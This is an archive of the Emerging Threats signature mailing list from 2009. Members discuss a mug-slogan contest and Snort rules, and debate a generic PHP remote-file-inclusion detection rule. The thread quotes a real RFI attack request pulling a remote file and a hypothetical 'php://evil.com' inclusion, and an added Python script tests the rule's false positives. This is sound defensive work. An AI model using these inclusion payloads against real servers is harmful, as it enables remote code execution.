Emerging Threats Signatures > > Subject: Re: [Emerging-Sigs] More Tshirts, and a Coffee Mug Contest > > > > Maybe for the coffee mug: > > alert ip any any -> $HOME_NET $MOUTH (content: "|C0 FF EE|";) > > > > > > > > > > Matt Jonkman wrote: > > > The first run of tshirts was a huge success, we sold every > > single one > > > and had orders backed up. Thanks everyone for both supporting the > > > project and being willing to be a human billboard to spread > > the word! > > > > > > A second printing run of shirts just arrived. We have the > > usual black > > > and blue, by popular demand we now have white as well, and > > some larger > > > sizes as requested. They all look great, so please take a > > moment and > > > order one. 
What we make on these is going straight into new > > hardware > > > for the sandnet to allow us to process more samples and > > write more signatures! > > > > > > We're also going to get coffee mugs and water bottles > > printed up, but > > > I'd like to see what everyone thinks for a saying on those. > > I'd rather > > > not just reproduce the tshirt saying on a mug, so I'd like to hear > > > what everyone thinks for these. > > > > > > So lets make it a contest, the person that comes up with the best > > > saying to put under the logo on the coffee mugs wins their > > choice of > > > tshirt and the first coffee mug off the presses. Please send your > > > ideas in to the list. It needs to be short enough to fit on > > a mug, but > > > funny or profound in some way. :) > > > > > > Get your tshirts here: > > > > > http://www.emergingthreats.net/index.php/support-et-and-buy-et-schwag. > > > html > > > > > > I'm looking forward to the ideas for the saying on the mugs. We may > > > even do a run of shirts with it if they keep selling! > > > > > > Thanks > > > > > > Matt > > > > > > > > > > _______________________________________________ > > Emerging-sigs mailing list > > Emerging-sigs at emergingthreats.net > > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > -------------- next part -------------- An HTML attachment was scrubbed... 
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090805/b8f1932a/attachment-0001.html

From emerging at emergingthreats.net Wed Aug 5 16:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Wed, 5 Aug 2009 16:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090805200011.B95204504A@goliath.jonkmans.com>

[***] Results from Oinkmaster started Wed Aug 5 16:00:11 2009 [***]

[///] Modified active rules: [///]

2003520 - ET WEB EXPLOIT webCalendar Remote File include (emerging-web.rules)
2009041 - ET SCAN SQLNinja MSSQL Database User Rights Scan (emerging-scan.rules)
2009042 - ET SCAN SQLNinja MSSQL Authentication Mode Scan (emerging-scan.rules)
2009043 - ET SCAN SQLNinja Attempt To Recreate xp_cmdshell Using sp_configure (emerging-scan.rules)
2009044 - ET SCAN SQLNinja Attempt To Create xp_cmdshell Session (emerging-scan.rules)
2009531 - ET TROJAN Garmania Trojan Check-in (emerging-virus.rules)
2009532 - ET TROJAN Unknown Trojan Check-in (3) (emerging-virus.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-sid-msg.map (20):
-> Added to emerging-sid-msg.map.txt (20):

From Dale_A_Haag at homedepot.com Wed Aug 5 16:23:25 2009
From: Dale_A_Haag at homedepot.com (Haag, Dale A)
Date: Wed, 5 Aug 2009 16:23:25 -0400
Subject: [Emerging-Sigs] Coffee Cup Slogans
In-Reply-To:
References:
Message-ID:

Here are my entries:

1. Coffee and Packets; Best if filtered
2. Professional Coffee Research Engineer ( bold font on PCRE )
3. 1 spoon sugar, 2 spoons [ INSERT ET LOGO HERE ]
4. Start Your Day Right [ INSERT ET LOGO HERE ]

-----------------------------------------
The information contained in this e-mail and any attached documents may contain information that is confidential or otherwise protected from disclosure. If you are not the intended recipient of this message, or if this message has been sent to you in error, please immediately alert the sender by reply e-mail and then delete this message, including any attachments.
Any dissemination, distribution or other use of the contents of this message by anyone other than the intended recipient is strictly prohibited.

From mail at mare-system.de Wed Aug 5 16:56:56 2009
From: mail at mare-system.de (mareadmin)
Date: Wed, 05 Aug 2009 22:56:56 +0200
Subject: [Emerging-Sigs] PHP Generic Remote File Inclusion attempt
Message-ID: <4A79F218.4010307@mare-system.de>

since i wanted to track every single rfi-connection-attempt
and monster-list doesn't cover everything
i build up some "generic" php-rfi-sig; i tested it, since yesterday
no fp, it even gets stuff like
GET /some.cgi?p=info/include/reputation/rep_profile.php?pun_user[language]=http://www.boxkk.com/[path]/info.txt?

it's a modified sid:2002997

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB PHP Generic Remote File Inclusion attempt"; flow:established,to_server; uricontent:".php"; nocase; content:"?"; pcre:"/\=(https?|ftps?|php)\:/Ui"; reference:url,www.sans.org/top20/; classtype:web-application-attack; reference:url,doc.emergingthreats.net/2002997; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP; sid:1122334408; rev:1;)

--
mex

MARE System Kiel .:. http://www.mare-system.de

From frank at knobbe.us Wed Aug 5 18:18:13 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 05 Aug 2009 17:18:13 -0500
Subject: [Emerging-Sigs] PHP Generic Remote File Inclusion attempt
In-Reply-To: <4A79F218.4010307@mare-system.de>
References: <4A79F218.4010307@mare-system.de>
Message-ID: <1249510693.4378.47.camel@localhost>

On Wed, 2009-08-05 at 22:56 +0200, mareadmin wrote:
> since i wanted to track every single rfi-connection-attempt
> and monster-list doesn't cover everything
> i build up some "generic" php-rfi-sig; i tested it, since yesterday
> no fp, it even gets stuff like
> GET /some.cgi?p=info/include/reputation/rep_profile.php?pun_user[language]=http://www.boxkk.com/[path]/info.txt?
>
> it's a modified sid:2002997
>
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB PHP Generic Remote File Inclusion attempt"; flow:established,to_server; uricontent:".php"; nocase; content:"?"; pcre:"/\=(https?|ftps?|php)\:/Ui"; reference:url,www.sans.org/top20/; classtype:web-application-attack; reference:url,doc.emergingthreats.net/2002997; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP; sid:1122334408; rev:1;)

What is the purpose of adding "php" to the URI check? Have you seen requests like "vuln.asp?inclue=php://evil.com/test.txt" ?

'Cause the pcre only matches for any =http, =https, =ftp, or =ftps in the URL. I can't see =php:// being a valid URI.

I agree that the old 2002997 needs to be updated (for example, add "profile" to the list of matches), but just matching on ".php" with any "=http" in the packet will cause a ton of falses. How big are the networks you tested this on?

Regards,
Frank

--
It is said that the Internet is a public utility. As such, it is best compared to a sewer. A big, fat pipe with a bunch of crap sloshing against your ports.

From kevross33 at googlemail.com Wed Aug 5 18:53:25 2009
From: kevross33 at googlemail.com (Kevin Ross)
Date: Wed, 5 Aug 2009 23:53:25 +0100
Subject: [Emerging-Sigs] PHP Generic Remote File Inclusion attempt
In-Reply-To: <4A79F218.4010307@mare-system.de>
References: <4A79F218.4010307@mare-system.de>
Message-ID:

It is best to have RFI sigs spread out avoiding PCRE for load. PCRE is a ten fold performance decrease so having three separate sigs theoretically saves a seven fold performance decrease. I submitted ones for PHP Inclusion as well as RFI earlier today.
Most of them I suggest to be disabled for most people and the sigs seemed
fine for a 20,000 user network.

Kev

2009/8/5 mareadmin
>
> since i wanted to track every single rfi-connection-attempt
> and monster-list doesnt covers everything
> i build up some "generic" php-rfi-sic; i tested it, since yesterday
> no fp, it even gets stuff like
> GET /some.cgi?p=info/include/reputation/rep_profile.php?pun_user[language]=
> http://www.boxkk.com/[path]/info.txt
> ?
>
> it a modified sid:2002997
>
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB PHP
> Generic Remote File Inclusion attempt"; flow:established,to_server;
> uricontent:".php"; nocase; content:"?"; pcre:"/\=(https?|ftps?|php)\:/Ui";
> reference:url,www.sans.org/top20/; classtype:web-application-attack;
> reference:url,doc.emergingthreats.net/2002997; reference:url,
> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP;
> sid:1122334408; rev:1;)
>
> --
>
>
> mex
>
>
> MARE System Kiel .:. http://www.mare-system.de
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
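An added example, not part of the thread or of the ET ruleset: a Python approximation of the three payload checks in the rule proposed above, run over sample request lines to show what it catches and where the false positives raised in the replies come from. The single pass of percent-decoding standing in for Snort's normalized URI buffer is an assumption, and every request except the one quoted in the thread is constructed.

```python
import re
from urllib.parse import unquote

# pcre:"/\=(https?|ftps?|php)\:/Ui" from the rule proposed in the thread.
RFI_PCRE = re.compile(r"=(https?|ftps?|php):", re.IGNORECASE)


def normalized_uri(request_line):
    """Return the percent-decoded URI of an HTTP request line, or None.

    Assumption: one pass of percent-decoding stands in for the normalized
    URI buffer that uricontent and the pcre U modifier inspect.
    """
    parts = request_line.split(" ")
    if len(parts) < 2:
        return None
    return unquote(parts[1])


def rule_fires(request_line):
    """Apply the rule's three payload checks to one request line."""
    uri = normalized_uri(request_line)
    if uri is None:
        return False
    if ".php" not in uri.lower():      # uricontent:".php"; nocase;
        return False
    if "?" not in request_line:        # content:"?";
        return False
    return RFI_PCRE.search(uri) is not None  # pcre with U and i modifiers


# (request line, analyst verdict). The first entry is the request quoted in
# the thread; every other entry is constructed for this example.
SAMPLES = [
    ("GET /some.cgi?p=info/include/reputation/rep_profile.php"
     "?pun_user[language]=http://www.boxkk.com/[path]/info.txt? HTTP/1.1", "rfi"),
    ("GET /view.php?file=http%3A%2F%2Fhost.example%2Finc.txt HTTP/1.1", "rfi"),
    ("GET /page.php?lang=php://input HTTP/1.1", "rfi"),
    ("GET /click.php?ad=42&referrer=http://news.example/story.html HTTP/1.1", "benign"),
    ("GET /login.php?return=https://shop.example/cart HTTP/1.1", "benign"),
    ("GET /index.php?page=about HTTP/1.1", "benign"),
    ("GET /redirect.asp?url=http://www.example.com/ HTTP/1.1", "benign"),
]


def triage(samples):
    """Sort labelled request lines by how the rule's verdict compares."""
    result = {"true_positive": [], "false_positive": [],
              "true_negative": [], "false_negative": []}
    for line, verdict in samples:
        fired = rule_fires(line)
        if fired and verdict == "rfi":
            key = "true_positive"
        elif fired:
            key = "false_positive"
        elif verdict == "rfi":
            key = "false_negative"
        else:
            key = "true_negative"
        result[key].append(line)
    return result


if __name__ == "__main__":
    for outcome, lines in triage(SAMPLES).items():
        print(f"{outcome}: {len(lines)}")
        for line in lines:
            print(f"    {line}")
```

The two false positives are ordinary requests that carry a full URL as a parameter value, which is the pattern the replies expect to see in volume on production networks.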
From jamie.riden at gmail.com Thu Aug 6 01:57:58 2009
From: jamie.riden at gmail.com (Jamie Riden)
Date: Thu, 6 Aug 2009 06:57:58 +0100
Subject: [Emerging-Sigs] PHP Generic Remote File Inclusion attempt
In-Reply-To: <1249510693.4378.47.camel@localhost>
References: <4A79F218.4010307@mare-system.de> <1249510693.4378.47.camel@localhost>
Message-ID: <17b0fcab0908052257u632540a8y3113267270b4c269@mail.gmail.com>

2009/8/5 Frank Knobbe :
> On Wed, 2009-08-05 at 22:56 +0200, mareadmin wrote:
>> since i wanted to track every single rfi-connection-attempt
>> and monster-list doesnt covers everything
>> i build up some "generic" php-rfi-sic; i tested it, since yesterday
>> no fp, it even gets stuff like
>> GET /some.cgi?p=info/include/reputation/rep_profile.php?pun_user[language]=http://www.boxkk.com/[path]/info.txt?
>>
>> it a modified sid:2002997
>>
>>
>> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB PHP Generic Remote File Inclusion attempt"; flow:established,to_server; uricontent:".php"; nocase; content:"?"; pcre:"/\=(https?|ftps?|php)\:/Ui"; reference:url,www.sans.org/top20/; classtype:web-application-attack; reference:url,doc.emergingthreats.net/2002997; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP; sid:1122334408; rev:1;)
>
>
> What is the purpose of adding "php" to the URI check? Have you see
> requests like "vuln.asp?inclue=php://evil.com/test.txt" ?
>
> 'Cause the pcre only matches for any =http, =https, =ftp, or =ftps in
> the URL. I can't see =php:// being a valid URI.

I love the smell of optimism in the mornings :)

See http://us.php.net/manual/en/wrappers.php, particularly
http://us.php.net/manual/en/wrappers.php.php

"php://input" can be the raw POST data for example.
also, an example given for php://filter:
readfile("php://filter/resource=http://www.example.com");

cheers,
Jamie

--
Jamie Riden / jamesr at europe.com / jamie at honeynet.org.uk
http://www.ukhoneynet.org/members/jamie/

From mail at mare-system.de Thu Aug 6 07:04:10 2009
From: mail at mare-system.de (mareadmin)
Date: Thu, 06 Aug 2009 13:04:10 +0200
Subject: [Emerging-Sigs] PHP Generic Remote File Inclusion attempt
Message-ID: <4A7AB8AA.4050401@mare-system.de>

>
>
> I agree that the old 2002997 needs to be updated (for example, add
> "profile" to the list of matches), but just matching on ".php" with any
> "=http" in the packet will cause a ton of falses.

no, i don't think so, since it's flow:to_server; maybe to put
content:"GET"; offset:0; or a total_depth of 200 in there for
performance, or pcre:"/../R"; but i don't think of massive fp.

when i have code running that allows RFI on any way via uri-request
then i should fire dem programmerz ;-)

thinking of webservers/webapps i can't imagine why one would want
to have rfis allowed.

mex

MARE System Kiel .:. http://www.mare-system.de

From jonkman at jonkmans.com Thu Aug 6 12:28:54 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 06 Aug 2009 12:28:54 -0400
Subject: [Emerging-Sigs] Snort Validator
Message-ID: <4A7B04C6.5010601@jonkmans.com>

Decoder's Snort Validator is being used here to keep your rules clean
and fresh. It's a great script, we've had it in place since about the
last time we had a ruleset error get published. (few months now) :)

We've got a wiki page up for it and decoder has generously decided to
publish. This script will be very useful for everyone that has any local
rulesets. Highly recommend using it.

You can find information and downloads here:

http://doc.emergingthreats.net/bin/view/Main/SnortValidator

Thanks again decoder!
Matt -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From evilghost at packetmail.net Thu Aug 6 12:46:04 2009 From: evilghost at packetmail.net (evilghost@packetmail.net) Date: Thu, 6 Aug 2009 11:46:04 -0500 Subject: [Emerging-Sigs] Second Try; For review; ISC/Twitter/Google ET Sigs Message-ID: <4A7B08CC.2080806@packetmail.net> John, thanks for these sigs, they're working well and firing like crazy today. I also noticed Google running a bit slower than normal so I suspect we'll see the remainder of the sigs firing soon. Wonder if ISC will go 'Yellow' because their twitters aren't tweeting... or something... Joel, hang in there buddy ;) - evilghost John Jacobs wrote: > Well that's annoying. Hopefully this works: > > Hello ET, first and foremost thank you for the strong effort and > excellent signatures. As such, in an attempt to give back to a > wonderful community, I humbly submit the following Snort rules for > inclusion into the ET signatures. A brief explanation is provided below: > > The first signature is designed to detect Google non-security related > announcement articles on the ISC Diary; this seems to be a topic of > extreme interest for some ISC Handlers despite having little to no > security value. I am unsure if this is a result of "Slow News Day" > syndrome or another behavioral oddity which manifests at ISC. This will > detect on "Google is slow" style articles as well, however, I am sure > this signature will require more tweaking as ISC encourages handing over > more personal data to a 3rd party under the guise of functionality. > > The second signature is designed to detect Joel peddling Twitter on the > isc.sans.org Diary, as again, this isn't security related. 
I suspect > the Twitter signature may tend to fire more than the Google as Joel > tends to get excited about "Tweeting" and "Twittering" and this spills > over into the ISC Diary anytime he's the "Handler on Duty". > > As always, please feel free to make changes to this signatures, > especially regarding performance. I've placed these into ET POLICY but > they may be more applicable in another classes, perhaps a blocking > class. I thank you in advance, feel free to modify for PCRE as well. > > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY > isc.sans.org Access"; flowbits:set,isc_sans; flowbits:noalert; > flow:established,to_server; content:"|0D 0A|Host|3A > 20|isc|2E|sans|2E|org|0D 0A|"; reference:url,isc.sans.org/; > classtype:policy-violation; sid:2009xxxx; rev:1;) > > alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY > isc.sans.org SANdlers say Google is slow"; flowbits:isset,isc_sans; > flow:established,from_server; content:"google"; nocase; content:"slow"; > nocase; reference:url,isc.sans.org/diary.html?storyid=6388; > reference:url,isc.sans.org/diary.html?storyid=5443; > classtype:policy-annoyance; sid:2009xxxx; rev:1;) > > alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY > isc.sans.org Joel Esler Peddling Twitter"; flowbits:isset,isc_sans; > flow:established,from_server; content:"Joel|20|Esler"; nocase; > content:"Twitter"; nocase; > reference:url,isc.sans.org/diary.html?storyid=6391; > reference:url,isc.sans.org/diary.html?storyid=6388; > classtype:policy-annoyance; sid:2009xxxx; rev:1;) > > - John Jacobs > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs From jonkman at jonkmans.com Thu Aug 6 14:07:06 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 06 Aug 2009 14:07:06 
-0400 Subject: [Emerging-Sigs] Coffee Cup Slogans In-Reply-To: References: Message-ID: <4A7B1BCA.1030906@jonkmans.com> There are so many good ideas I'm getting the better ones together and we'll do a vote. I know the poll thing is hokey, but I think it's the best way to get a good decision made here. Keep sending the ideas for a couple more days then I'll put the poll up and let everyone know. Thanks for the ideas! These are all great. Especially the sourcefire ones. :) Matt Haag, Dale A wrote: > Here are my entries: > > 1. Coffee and Packets; Best if filtered > > 2. Professional > Coffee > Research > Engineer > ( bold font on PCRE ) > > 3. 1 spoon sugar, 2 spoons > [ INSERT ET LOGO HERE ] > > 4. Start Your Day Right > [ INSERT ET LOGO HERE ] > > > ----------------------------------------- > The information contained in this e-mail and any attached documents > may contain information that is confidential or otherwise protected > from disclosure. If you are not the intended recipient of this > message, or if this message has been sent to you in error, please > immediately alert the sender by reply e-mail and then delete this > message, including any attachments. Any dissemination, distribution > or other use of the contents of this message by anyone other than > the intended recipient is strictly prohibited. 
> _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From bschnzl at cotse.net Thu Aug 6 14:15:31 2009 From: bschnzl at cotse.net (Bill Scherr IV) Date: Thu, 06 Aug 2009 14:15:31 -0400 Subject: [Emerging-Sigs] Coffee Cup Slogans In-Reply-To: <4A7B1BCA.1030906@jonkmans.com> References: , , <4A7B1BCA.1030906@jonkmans.com> Message-ID: Here's One There are only three things you can trust: Coffee Packets [Logo] (Or did someone already post that?) B. Circa 14:07, 6 Aug 2009, a note, claiming source Matt Jonkman , was sent to me: Date sent: Thu, 06 Aug 2009 14:07:06 -0400 From: Matt Jonkman To: "Haag, Dale A" Copies to: emerging-sigs at emergingthreats.net Subject: Re: [Emerging-Sigs] Coffee Cup Slogans > There are so many good ideas I'm getting the better ones together and > we'll do a vote. I know the poll thing is hokey, but I think it's the > best way to get a good decision made here. > > Keep sending the ideas for a couple more days then I'll put the poll up > and let everyone know. > > Thanks for the ideas! These are all great. Especially the sourcefire > ones. :) > > Matt > > Haag, Dale A wrote: > > Here are my entries: > > > > 1. Coffee and Packets; Best if filtered > > > > 2. Professional > > Coffee > > Research > > Engineer > > ( bold font on PCRE ) > > > > 3. 1 spoon sugar, 2 spoons > > [ INSERT ET LOGO HERE ] > > > > 4. 
Start Your Day Right
> > [ INSERT ET LOGO HERE ]
> >
>
> --
> --------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Open Information Security Foundation (OISF)
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> http://www.openinformationsecurityfoundation.org
> --------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc

Bill Scherr IV, GSEC, GCIA
Principal Security Engineer
EWA Information and Infrastructure Technologies
bscherr at iit-tek.com
bscherr at ewa.com
703-478-7608

From David.R.Wharton at regions.com Thu Aug 6 14:15:37 2009
From: David.R.Wharton at regions.com (David.R.Wharton@regions.com)
Date: Thu, 6 Aug 2009 13:15:37 -0500
Subject: [Emerging-Sigs] Coffee Cup Slogans
In-Reply-To: <4A7B1BCA.1030906@jonkmans.com>
Message-ID:

Doesn't look like my submission yesterday made it thru to the list so here
it is:

pcre:"/C0ffE{2}\s+Ma\x6Bes\s+Me\s[^S]*Regul4r/ig";

-David

Matt Jonkman
Sent by: emerging-sigs-bounces at
emergingthreats.net 08/06/2009 01:07 PM To "Haag, Dale A" cc emerging-sigs at emergingthreats.net Subject Re: [Emerging-Sigs] Coffee Cup Slogans There are so many good ideas I'm getting the better ones together and we'll do a vote. I know the poll thing is hokey, but I think it's the best way to get a good decision made here. Keep sending the ideas for a couple more days then I'll put the poll up and let everyone know. Thanks for the ideas! These are all great. Especially the sourcefire ones. :) Matt Haag, Dale A wrote: > Here are my entries: > > 1. Coffee and Packets; Best if filtered > > 2. Professional > Coffee > Research > Engineer > ( bold font on PCRE ) > > 3. 1 spoon sugar, 2 spoons > [ INSERT ET LOGO HERE ] > > 4. Start Your Day Right > [ INSERT ET LOGO HERE ] > > > ----------------------------------------- > The information contained in this e-mail and any attached documents > may contain information that is confidential or otherwise protected > from disclosure. If you are not the intended recipient of this > message, or if this message has been sent to you in error, please > immediately alert the sender by reply e-mail and then delete this > message, including any attachments. Any dissemination, distribution > or other use of the contents of this message by anyone other than > the intended recipient is strictly prohibited. 
> _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc _______________________________________________ Emerging-sigs mailing list Emerging-sigs at emergingthreats.net http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs From jonkman at jonkmans.com Thu Aug 6 14:17:20 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 06 Aug 2009 14:17:20 -0400 Subject: [Emerging-Sigs] nagios statuswml.cgi sig issue? In-Reply-To: References: Message-ID: <4A7B1E30.9010109@jonkmans.com> That would explain it, snort definitely did not like it. What would you prefer the pcre to be avoiding the backtrack? Matt David.R.Wharton at regions.com wrote: > The original PCRE looks good to me. The purpose of the (?: part is to > tell the PCRE engine not to keep track of a back reference to whatever > matches in the parentheses. It is done for performance reasons but maybe > snort doesn't support it. Making the colon hex removes this functionality > and breaks the signature itself since now it won't match on a 'ping=' > payload. > > For details on the non-capturing group syntax, see the PCRE man page(s) ( > http://www.pcre.org/pcre.txt). > > -David Wharton > > > > > Frank Knobbe > Sent by: emerging-sigs-bounces at emergingthreats.net > 08/04/2009 11:10 AM > > To > Matt Jonkman > cc > Emerging-sigs at emergingthreats.net > Subject > Re: [Emerging-Sigs] nagios statuswml.cgi sig issue? > > > > > > > On Tue, 2009-08-04 at 12:02 -0400, Matt Jonkman wrote: >> Fixed up. Escaping the colon in the pcre caused issues. 
Made it hex and >> we're good. Thanks Frank! > > I tried that yesterday but it didn't fix the PCRE issue. I'll try again > shortly. > > -Frank > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Thu Aug 6 14:32:16 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 06 Aug 2009 14:32:16 -0400 Subject: [Emerging-Sigs] Coffee Cup Slogans In-Reply-To: References: Message-ID: <4A7B21B0.5010005@jonkmans.com> Got it! David.R.Wharton at regions.com wrote: > Doesn't look like my submision yesterday made it thru to the list so here > it is: > > pcre:"/C0ffE{2}\s+Ma\x6Bes\s+Me\s[^S]*Regul4r/ig"; > > -David > > > > > Matt Jonkman > Sent by: emerging-sigs-bounces at emergingthreats.net > 08/06/2009 01:07 PM > > To > "Haag, Dale A" > cc > emerging-sigs at emergingthreats.net > Subject > Re: [Emerging-Sigs] Coffee Cup Slogans > > > > > > > There are so many good ideas I'm getting the better ones together and > we'll do a vote. I know the poll thing is hokey, but I think it's the > best way to get a good decision made here. > > Keep sending the ideas for a couple more days then I'll put the poll up > and let everyone know. > > Thanks for the ideas! These are all great. Especially the sourcefire > ones. :) > > Matt > > Haag, Dale A wrote: >> Here are my entries: >> >> 1. Coffee and Packets; Best if filtered >> >> 2. Professional >> Coffee >> Research >> Engineer >> ( bold font on PCRE ) >> >> 3. 1 spoon sugar, 2 spoons >> [ INSERT ET LOGO HERE ] >> >> 4. 
Start Your Day Right >> [ INSERT ET LOGO HERE ] >> >> >> ----------------------------------------- >> The information contained in this e-mail and any attached documents >> may contain information that is confidential or otherwise protected >> from disclosure. If you are not the intended recipient of this >> message, or if this message has been sent to you in error, please >> immediately alert the sender by reply e-mail and then delete this >> message, including any attachments. Any dissemination, distribution >> or other use of the contents of this message by anyone other than >> the intended recipient is strictly prohibited. >> _______________________________________________ >> Emerging-sigs mailing list >> Emerging-sigs at emergingthreats.net >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Thu Aug 6 14:33:17 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 06 Aug 2009 14:33:17 -0400 Subject: [Emerging-Sigs] Coffee Cup Slogans In-Reply-To: References: , , <4A7B1BCA.1030906@jonkmans.com> Message-ID: <4A7B21ED.5030606@jonkmans.com> Amen! :) Matt Bill Scherr IV wrote: > Here's One > > There are only three things you can trust: > Coffee > Packets > [Logo] > > > (Or did someone already post that?) > B. > > Circa 14:07, 6 Aug 2009, a note, claiming source Matt Jonkman , was sent to me: > > Date sent: Thu, 06 Aug 2009 14:07:06 -0400 > From: Matt Jonkman > To: "Haag, Dale A" > Copies to: emerging-sigs at emergingthreats.net > Subject: Re: [Emerging-Sigs] Coffee Cup Slogans > >> There are so many good ideas I'm getting the better ones together and >> we'll do a vote. 
>> --
>> --------------------------------------------
>> Matthew Jonkman
>> Emerging Threats
>> Open Information Security Foundation (OISF)
>> Phone 765-429-0398
>> Fax 312-264-0205
>> http://www.emergingthreats.net
>> http://www.openinformationsecurityfoundation.org
>> --------------------------------------------
>>
>> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>
> Bill Scherr IV, GSEC, GCIA
> Principal Security Engineer
> EWA Information and Infrastructure Technologies
> bscherr at iit-tek.com
> bscherr at ewa.com
> 703-478-7608
>

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From jonkman at jonkmans.com Thu Aug 6 14:37:57 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 06 Aug 2009 14:37:57 -0400
Subject: [Emerging-Sigs] PHP Generic Remote File Inclusion attempt
In-Reply-To: <1249510693.4378.47.camel@localhost>
References: <4A79F218.4010307@mare-system.de> <1249510693.4378.47.camel@localhost>
Message-ID: <4A7B2305.4000605@jonkmans.com>

Adding profile to 2002997.

I'm scared of the .php and an ftp/http in it because there are many
legitimate places that happens. I see a ton of ad servers that put the
referrer in the uri, etc. I think we'd be killing ourselves here.
matt Frank Knobbe wrote: > On Wed, 2009-08-05 at 22:56 +0200, mareadmin wrote: >> since i wanted to track every single rfi-connection-attempt >> and monster-list doesnt covers everything >> i build up some "generic" php-rfi-sic; i tested it, since yesterday >> no fp, it even gets stuff like >> GET /some.cgi?p=info/include/reputation/rep_profile.php?pun_user[language]=http://www.boxkk.com/[path]/info.txt? >> >> it a modified sid:2002997 >> >> >> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB PHP Generic Remote File Inclusion attempt"; flow:established,to_server; uricontent:".php"; nocase; content:"?"; pcre:"/\=(https?|ftps?|php)\:/Ui"; reference:url,www.sans.org/top20/; classtype:web-application-attack; reference:url,doc.emergingthreats.net/2002997; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP; sid:1122334408; rev:1;) > > > What is the purpose of adding "php" to the URI check? Have you see > requests like "vuln.asp?inclue=php://evil.com/test.txt" ? > > 'Cause the pcre only matches for any =http, =https, =ftp, or =ftps in > the URL. I can't see =php:// being a valid URI. > > > I agree that the old 2002997 needs to be updated (for example, add > "profile" to the list of matches), but just matching on ".php" with any > "=http" in the packet will cause a ton of falses. > > How big are the networks you tested this on? 
>
> Regards,
> Frank
>
>
>
>
> ------------------------------------------------------------------------
>

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From jonkman at jonkmans.com Thu Aug 6 14:49:14 2009
